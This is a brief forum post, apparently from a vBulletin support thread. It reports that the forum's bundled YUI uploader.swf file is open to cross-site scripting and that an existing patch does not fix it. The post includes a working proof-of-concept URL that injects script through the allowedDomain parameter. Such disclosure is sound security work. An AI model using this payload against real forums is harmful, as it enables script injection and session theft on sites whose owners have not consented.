Code:
[COLOR=#333333][FONT=arial]forum.domain.com/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert(document.domain);}//[/FONT][/COLOR]
Regards.
edit;
just saw this; http://www.vbulletin.org/forum/showt...39#post2472139 and the patch did not fix the xss.
(my user initially showed me the xss).
Comment